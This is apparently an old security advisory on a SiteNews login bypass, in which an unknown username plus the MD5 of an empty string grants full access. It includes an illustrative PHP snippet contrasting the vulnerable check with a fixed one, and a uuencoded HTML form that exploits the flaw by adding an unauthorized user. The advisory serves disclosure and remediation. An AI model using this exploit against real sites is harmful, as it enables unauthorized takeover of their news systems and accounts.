
SiteNews remote add user exploit



20th Feb 2002 [SBWID-5117]
COMMAND

	SiteNews remote add user exploit
	

	

SYSTEMS AFFECTED

	SiteNews prior to version 0.12

PROBLEM

	Ulf Harnhammar found the following:
	

	SiteNews is an open-source system for displaying and managing news
	items on websites (http://www.linuxnetwork.nl/).
	

	The function GetPassword in function.php returns an empty string when
	it is asked for a non-existent username. Together with the fact that
	the login form sends the username in cleartext and the password as an
	MD5 sum, this means that you can log in without an account by posting
	a non-existent username together with the MD5 sum of the empty string
	as the password. SiteNews has no concept of user levels, so once you
	are in, you have full control over all news items and all users.
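
	The following PHP snippet is an added illustration of the logic bug
	described above; it is not SiteNews's own code. The function and
	variable names, the plaintext user table and the assumption that the
	server compares the posted MD5 sum against md5() of whatever
	GetPassword returns are all constructed for the example. It shows why
	an empty-string fallback for unknown users is an authentication bypass,
	and the fail-closed lookup that removes it.

```php
<?php
// Hypothetical reconstruction of the vulnerable login check; NOT the
// project's actual code. All names below are assumed for illustration.

// Constructed sample user table: username => password. Plaintext storage
// is assumed here only so the server can derive an MD5 sum from it.
$USERS = ['editor' => 's3cret'];

// Vulnerable lookup: an unknown username falls through to an empty
// string, which is indistinguishable from an account whose password is "".
function GetPassword_vulnerable(array $users, string $user): string {
    return $users[$user] ?? '';
}

// Vulnerable check (assumed shape): the client posts md5($password) and the
// server compares it with md5() of the looked-up value. For an unknown user
// that is md5('') = 'd41d8cd98f00b204e9800998ecf8427e', a public constant.
function checkLogin_vulnerable(array $users, string $user, string $postedMd5): bool {
    return md5(GetPassword_vulnerable($users, $user)) === $postedMd5;
}

// Hardened lookup: report "no such user" as null instead of "".
function GetPassword_fixed(array $users, string $user): ?string {
    return $users[$user] ?? null;
}

// Hardened check: fail closed on unknown users and empty passwords, and
// compare the digests in constant time.
function checkLogin_fixed(array $users, string $user, string $postedMd5): bool {
    $stored = GetPassword_fixed($users, $user);
    if ($stored === null || $stored === '') {
        return false;   // unknown user or empty password: always reject
    }
    return hash_equals(md5($stored), $postedMd5);
}

$emptyMd5 = md5('');   // d41d8cd98f00b204e9800998ecf8427e

printf("vulnerable, unknown user + md5(''): %s\n",
    checkLogin_vulnerable($USERS, 'nobody', $emptyMd5) ? 'LOGGED IN' : 'rejected');
printf("fixed,      unknown user + md5(''): %s\n",
    checkLogin_fixed($USERS, 'nobody', $emptyMd5) ? 'LOGGED IN' : 'rejected');
printf("fixed,      known user + right md5: %s\n",
    checkLogin_fixed($USERS, 'editor', md5('s3cret')) ? 'LOGGED IN' : 'rejected');
```

	The first line prints LOGGED IN, the second rejected, the third LOGGED
	IN. The essential fix is that a missing account must never be
	represented by a value that can also be a valid credential; the
	constant-time comparison is a separate hardening. Hashing the password
	with MD5 in the browser is not a substitute for TLS or for proper
	server-side password hashing, but that is outside the scope of this
	advisory.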
	

	Exploit
	=======

	You type in a non-existent username and the username and password
	combination that you wish to add to the system, and the exploit
	creates the new user for you, despite the fact that you are not
	authorized.

	begin 644 sitenews_exploit.html
	M/"%$3T-465!%($A434P@4%5"3$E#("(M+R]7,T,O+T141"!(5$U,(#0N,#$@
	M5')A;G-I=&EO;F%L+R]%3B(*(FAT='`Z+R]W=W<N=S,N;W)G+U12+VAT;6PT
	M+VQO;W-E+F1T9"(^"CQH=&UL/@H\:&5A9#X*/'1I=&QE/E-I=&5.97=S($5X
	M<&QO:70@,"XQ/"]T:71L93X*/&UE=&$@:'1T<"UE<75I=CTB0V]N=&5N="U4
	M>7!E(B!C;VYT96YT/2)T97AT+VAT;6P[(&-H87)S970]:7-O+3@X-3DM,2(^
	M"CPO:&5A9#X*"CQB;V1Y(&)G8V]L;W(](B-F9F9F9F8B('1E>'0](B,P,#`P
	M,#`B(&QI;FL](B,P,#`P,#`B(&%L:6YK/2(C,#`P,#`P(@IV;&EN:STB(S`P
	M,#`P,"(^"CQH,3Y3:71E3F5W<R!%>'!L;VET(#`N,3PO:#$^"@H\9F]R;2!M
	M971H;V0](E!/4U0B(&%C=&EO;CTB:'1T<#HO+W=W=RYV:6-T:6TN8V]M+W-I
	M=&5N97=S+V%D;6EN+V%D9%]U<V5R+G!H<"(*96YC='EP93TB;75L=&EP87)T
	M+V9O<FTM9&%T82(^"E=R:71T96X@8GD@/&$@:')E9CTB;6%I;'1O.FUE=&%U
	M<D!P<F]N=&]M86EL+F-O;2(^56QF($@F875M;#MR;FAA;6UA<CPO83X@:6X*
	M,C`P,BX\<#X*"E1H:7,@97AP;&]I="!W:6QL(&%D9"!A(&YE=R!U<V5R('1O
	M(&$@4VET94YE=W,@:6YS=&%L;&%T:6]N+B!4:&4@97AP;&]I="!U<V5R"FES
	M(&)A<VEC86QL>2!A;GD@;F]N+65X:7-T96YT('5S97(L('-O('EO=2!J=7-T
	M('1Y<&4@<V]M92!R86YD;VT@8VAA<F%C=&5R<PIT:&5R92X\<#X*"D5X<&QO
	M:70@=7-E<CH\8G(^"CQI;G!U="!T>7!E/2)T97AT(B!N86UE/2)U<V5R;F%M
	M92(@<VEZ93TB,C`B/CQB<CX*/&EN<'5T('1Y<&4](FAI9&1E;B(@;F%M93TB
	M<&%S<W=O<F0B"G9A;'5E/2)D-#%D.&-D.3AF,#!B,C`T93DX,#`Y.3AE8V8X
	M-#(W92(@<VEZ93TB,"(^"CPA+2T@5&AI<R!I<R!T:&4@340U('-U;2!F;W(@
	M86X@96UP='D@<W1R:6YG+B`M+3X*3F5W('5S97(Z/&)R/@H\:6YP=70@='EP
	M93TB=&5X="(@;F%M93TB;F5W7W5S97(B('-I>F4](C(P(CX\8G(^"CQI;G!U
	M="!T>7!E/2)H:61D96XB(&YA;64](F%C=&EO;C$B('9A;'5E/2(Q(B!S:7IE
	M/2(P(CX*3F5W('!A<W-W;W)D.CQB<CX*/&EN<'5T('1Y<&4](G1E>'0B(&YA
	M;64](FYE=U]P87-S=V]R9"(@<VEZ93TB,C`B/CQB<CX*/&EN<'5T('1Y<&4]
	M(G-U8FUI="(@=F%L=64](D5X<&QO:70@:70B/@H\+V9O<FT^"@H\+V)O9'D^
	)"CPO:'1M;#X*
	`
	end


SOLUTION

	Upgrade to version 0.12.

